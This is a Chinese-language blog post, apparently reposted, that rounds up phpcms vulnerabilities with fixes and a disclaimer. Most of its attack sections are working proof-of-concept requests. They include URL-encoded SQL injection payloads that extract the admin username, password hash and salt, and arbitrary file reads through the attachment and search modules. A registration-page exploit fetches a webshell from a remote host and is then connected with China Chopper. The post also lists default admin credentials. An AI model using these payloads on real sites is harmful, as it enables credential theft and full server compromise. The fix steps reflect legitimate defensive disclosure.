Phpcms漏洞

phpcms漏洞

　

最近某位大牛說，將放出3個phpcms的0day漏洞，目前我所瞭解到的已經有2個phpcms漏洞被流傳開來，並放出了poc。phpcms應用範圍還是比較廣的，在此記錄分享一下幾個最新的phpcms漏洞。

免責申明：文章中的工具等僅供個人測試研究，請在下載後24小時內刪除，不得用於商業或非法用途，否則後果自負

phpcms 任意文件讀取漏洞

更新於2017年5月4日
漏洞具體細節參考：http://bobao.360.cn/learning/detail/3805.html

漏洞利用

方案一：
登錄普通用戶，訪問鏈接：

1	http://localhost/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C

獲取分配的att_json,然後將這段json值帶入到down類的init函數中去：

1	http://localhost/index.php?m=content&c=down&a=init&a_k=013ceMuDOmbKROPvvdV0SvY95fzhHTfURBCK4CSbrnbVp0HQOGXTxiHdRp2jM-onG9vE0g5SKVcO_ASqdLoOSsBvN7nFFopz3oZSTo2P7b6N_UB037kehz2lj12lFGtTsPETp-a0mAHXgyjn-tN7cw4nZdk10Mr2g5NM_x215AeqpOF6_mIF7NsXvWiZl35EmQ

方案二：
在未登錄的情況下訪問：

1	http://localhost/index.php?m=wap&c=index&a=init&siteid=1

獲取當前的siteid,然後再訪問:

1 2	http://localhost/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/modules/content/down.ph&f=p%3%25252%2*70C POST_DATA:userid_flash=14e0uml6m504Lbwsd0mKpCe0EocnqxTnbfm4PPLW

修復方案

升級至官方最新版本

phpcms sql漏洞

Poc

存在sql注入漏洞的頁面：
http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login
獲取當前數據庫，post：

1

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabase())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=驗證碼&dosubmit=%E7%99%BB%E5%BD%95

獲取當前用戶，post：

1 2 3

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=驗證碼&dosubmit=%E7%99%BB%E5%BD%95 獲取表名： forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2btable_name%2bfrom%2binformation_schema.tables%2bwhere%2btable_schema='phpcmsv9'%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=驗證碼&dosubmit=%E7%99%BB%E5%BD%95

若要獲取其他表名，修改limit即可。
獲取用戶名:

1

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2busername%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=驗證碼&dosubmit=%E7%99%BB%E5%BD%95

獲取密碼：

1

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bpassword%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=驗證碼&dosubmit=%E7%99%BB%E5%BD%95

獲取到的密碼爲30位的md5，一般的MD5是32位，所以我們需要再獲取後2位：

1

orward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(substring((select%2bpassword%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c-2%252c2))%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=驗證碼&dosubmit=%E7%99%BB%E5%BD%95

phpcms是加鹽（salt）的，獲取salt:

1

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bencrypt%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=驗證碼&dosubmit=%E7%99%BB%E5%BD%95

以上Poc來自：https://www.unhonker.com/bug/1834.html

exp漏洞利用腳本

exp利用腳本在這裏不公開放出了，大家可以利用在線檢測平臺進行檢測：https://www.seebug.org/monster/
exp腳本可以參考：https://www.waitalone.cn/phpcmsv9-authkey-exp.html
漏洞細節請參考：http://mp.weixin.qq.com/s/cI-wbQyX-3WLhxJ5kqez4A

漏洞修復方案

• 去掉modules\content\down.php文件

phpcms註冊頁面getshell漏洞

• 存在的漏洞：php遠程文件包含、任意文件上傳
• 漏洞利用點：phpcms註冊頁面
• 利用類型：http post請求導致任意文件上傳+getshell

Post Poc

1	siteid=1&modelid=11&username=newbie&password=newbie&[email protected]&info[content]=<img src=http://shhdmqz.com/newbie.txt?.php#.jpg>&dosubmit=1&protocol=

注意：http://shhdmqz.com/newbie.txt爲遠程服務器上的shell文件，這個漏洞利用了遠程文件包含與文件上傳漏洞。

漏洞利用細節

　　訪問註冊頁面發送post包，重構info字段內容，寫入遠程包含的文件地址《img src=http://shhdmqz.com/newbie.txt?.php#.jpg》，newbie.txt爲文件名，?.php#.jpg爲構造的文件名，爲了繞過後綴名限制。回包將會有報錯信息，但文件可以上傳成功，且報錯信息中含有上傳的文件路徑，可用菜刀鏈接。

exp漏洞利用腳本

exp利用腳本在這裏不公開放出了，大家可以利用在線檢測平臺進行檢測：https://www.seebug.org/monster/

漏洞修復方案

暫時性修復：

• 關閉註冊頁面
• 關閉遠程文件包含，即關閉allow_url_fopen

徹底性修復：
修改phpcms/libs/classes/attachement.class.php文件中的download函數在
foreach($remotefileurls as $k=>$file)循環中，大約是167行左右的位置，將

1	if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue; $filename = fileext($file);

修改成

1	$filename = fileext($k);

關於文件包含漏洞，可參考：文件包含漏洞

任意文件讀取漏洞

1	index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php

phpcms敏感信息

• 默認賬號密碼：phpcms/phpcms
• 默認後臺： http://www.xx.com/index.php?m=admin&c=index&a=login&pc_hash=
• 會員中心地址：index.php?m=member&c=index&a=login

本篇將持續跟蹤phpcms最新漏洞狀況，並附上檢測方法以及修復方案，協助管理員早日修復漏洞，謝謝！

轉自nMask